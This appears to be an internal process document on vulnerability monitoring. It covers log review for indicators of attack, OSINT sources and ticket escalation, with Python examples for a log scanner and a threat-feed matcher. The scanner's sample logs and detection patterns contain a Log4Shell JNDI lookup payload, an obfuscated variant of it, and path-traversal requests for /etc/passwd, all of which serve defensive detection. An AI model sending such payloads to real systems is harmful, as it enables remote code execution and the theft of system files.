Overview

The vulnerability monitoring process observes application behaviour and tracks exploits, threats and advanced persistent threats (APTs) related to the vulnerabilities found in the proactive process. Continuous monitoring is done by checking logs for indicators of attack (IoA). It also covers open source intelligence (OSINT) sources such as cvedetails.com, nvd.nist.gov, exploit-db.com, the Google Hacking Database, and talosintelligence.com.

Log monitoring

Logs record application and host behaviour. Matching them against APT tactics and against exploit or vulnerability indicators gives visibility into the state of the applications, the hosts, and the network as a whole.
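As an added example (not code from the original page), the following Python matches access-log lines against a small indicator list and counts hits per source, which is the shape of an alert rule on a log management platform. The log lines are constructed (TEST-NET addresses, no real hosts); the indicator labels and patterns are assumptions made for this example, except CVE-2021-44228, which is the real Log4Shell identifier.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Indicators of attack (IoA): a regex over the raw log line mapped to the
# vulnerability or technique it evidences. CVE-2021-44228 is the real Log4Shell
# identifier; the other labels and all patterns are constructed for this example.
INDICATORS = {
    "CVE-2021-44228 JNDI lookup string": re.compile(r"\$\{jndi:", re.IGNORECASE),
    "path traversal attempt": re.compile(r"(\.\./|\.\.%2f|%2e%2e%2f)", re.IGNORECASE),
    "known scanner user-agent": re.compile(r"(nikto|sqlmap|nuclei)", re.IGNORECASE),
}

# Combined (Apache/Nginx) access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample lines; 198.51.100.0/24, 203.0.113.0/24 and 192.0.2.0/24 are documentation ranges.
SAMPLE_LOGS = [
    '198.51.100.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2023:13:55:40 +0000] "GET /static/app.js HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:56:01 +0000] "GET /api/v1/login HTTP/1.1" 200 312 "-" "${jndi:ldap://203.0.113.5/a}"',
    '203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /download?file=../../etc/passwd HTTP/1.1" 400 0 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:56:03 +0000] "GET /download?file=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 400 0 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [10/Oct/2023:13:57:10 +0000] "GET /robots.txt HTTP/1.1" 404 0 "-" "Mozilla/5.0 (compatible; Nikto/2.1.6)"',
]


@dataclass(frozen=True)
class Detection:
    src_ip: str
    timestamp: str
    indicator: str
    request: str   # request line, for the analyst who triages the ticket
    matched: str   # the exact substring that fired the indicator


def parse(line):
    """Return the parsed fields, or None when the line does not match the combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan(lines):
    """Match every parseable line against every indicator; one Detection per (line, indicator) hit."""
    detections = []
    for line in lines:
        fields = parse(line)
        if fields is None:
            continue  # in production, count unparseable lines rather than silently dropping them
        for label, pattern in INDICATORS.items():
            hit = pattern.search(line)
            if hit:
                detections.append(Detection(fields["ip"], fields["ts"], label, fields["req"], hit.group(0)))
    return detections


def hits_by_source(detections):
    """Detections per source IP: the number an alert threshold is applied to."""
    return Counter(d.src_ip for d in detections)


if __name__ == "__main__":
    found = scan(SAMPLE_LOGS)
    for d in found:
        print(f"{d.timestamp} {d.src_ip} {d.indicator}: {d.request} ({d.matched!r})")
    print(hits_by_source(found))
```

Literal patterns like `\$\{jndi:` are a starting point, not a complete detection: Log4Shell payloads were routinely obfuscated with nested lookups such as `${${lower:j}ndi:`, so indicators taken from a threat intelligence feed should be reviewed for the evasions the feed does not cover before they become production alerts.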

Threat Intelligence monitoring

Threat intelligence provides the latest information about threats or vulnerabilities in the components used by an application or host. This information is used to verify whether the threat or vulnerability is present in our environment and to plan the mitigation or remediation needed to prevent it.

Monitoring Strategy

Monitoring is performed through daily review of OSINT sources and through alerts developed on the log management platform.

If log monitoring raises a detection against a component used by our application, a reactive mitigation should be planned to address the threat behind the detection. If a new threat intelligence item is published, the threat should be verified against the application, host and network logs. Where needed, a Proof of Concept (PoC) should be performed to confirm whether the threat exists in the network.

Escalation

Detections and threat intelligence items should be raised to the vulnerability incident handling process. Each unique detection or threat intelligence item gets its own Jira ticket.
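An added example, not code from the original page, covering the verification step in the Monitoring Strategy and the one-ticket-per-item rule in Escalation: a threat intelligence feed is checked against a component inventory, and the applicable items are grouped by advisory so each unique advisory yields exactly one ticket. The inventory, the advisories and their EXAMPLE-* identifiers are constructed for the example; the introduced/fixed range shape mirrors OSV-style affected ranges, and version strings are assumed to be dotted numerics.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Component:
    host: str
    name: str
    version: str


@dataclass(frozen=True)
class Advisory:
    advisory_id: str
    package: str
    introduced: str         # first affected version (inclusive)
    fixed: Optional[str]    # first fixed version (exclusive); None means no fix published
    summary: str


# Constructed inventory. In practice this comes from an SBOM or a package-manager export.
INVENTORY = [
    Component("web01", "example-web-framework", "2.14.1"),
    Component("web02", "example-web-framework", "2.17.0"),
    Component("db01", "example-db-driver", "1.4.2"),
    Component("app01", "example-json-parser", "3.0"),
]

# Constructed feed entries with hypothetical identifiers (not real CVEs).
FEED = [
    Advisory("EXAMPLE-0001", "example-web-framework", "2.0", "2.15.0", "remote code execution via crafted input"),
    Advisory("EXAMPLE-0002", "example-db-driver", "1.0", None, "authentication bypass; no fix released"),
    Advisory("EXAMPLE-0003", "example-queue-client", "0.1", "5.0", "denial of service"),
    Advisory("EXAMPLE-0004", "example-web-framework", "2.17.0", "2.17.1", "incomplete fix for EXAMPLE-0001"),
]


def parse_version(v):
    """Dotted numeric versions only; pre-release tags must be normalised upstream."""
    return tuple(int(part) for part in v.split("."))


def version_in_range(version, introduced, fixed):
    """True when introduced <= version < fixed, zero-padding so that '2.15' equals '2.15.0'."""
    parts = [parse_version(version), parse_version(introduced)]
    if fixed is not None:
        parts.append(parse_version(fixed))
    width = max(len(p) for p in parts)
    v, lo, *hi = (p + (0,) * (width - len(p)) for p in parts)
    if v < lo:
        return False
    return not hi or v < hi[0]


def match_feed(inventory, feed):
    """Every (advisory, component) pair whose component name and version fall inside the affected range."""
    return [
        (adv, comp)
        for adv in feed
        for comp in inventory
        if comp.name == adv.package and version_in_range(comp.version, adv.introduced, adv.fixed)
    ]


def tickets(matches):
    """One entry per unique advisory listing the affected hosts: the ticket granularity used in escalation."""
    by_advisory = defaultdict(list)
    for adv, comp in matches:
        by_advisory[adv.advisory_id].append(f"{comp.host}:{comp.name}@{comp.version}")
    return dict(by_advisory)


if __name__ == "__main__":
    for advisory_id, hosts in tickets(match_feed(INVENTORY, FEED)).items():
        print(f"{advisory_id}: {', '.join(hosts)}")
```

An advisory with no fixed version (EXAMPLE-0002 above) matches every version from the introduced one onward, so it stays open until the feed is updated; a match does not by itself prove exploitability, which is what the PoC step in the Monitoring Strategy is for.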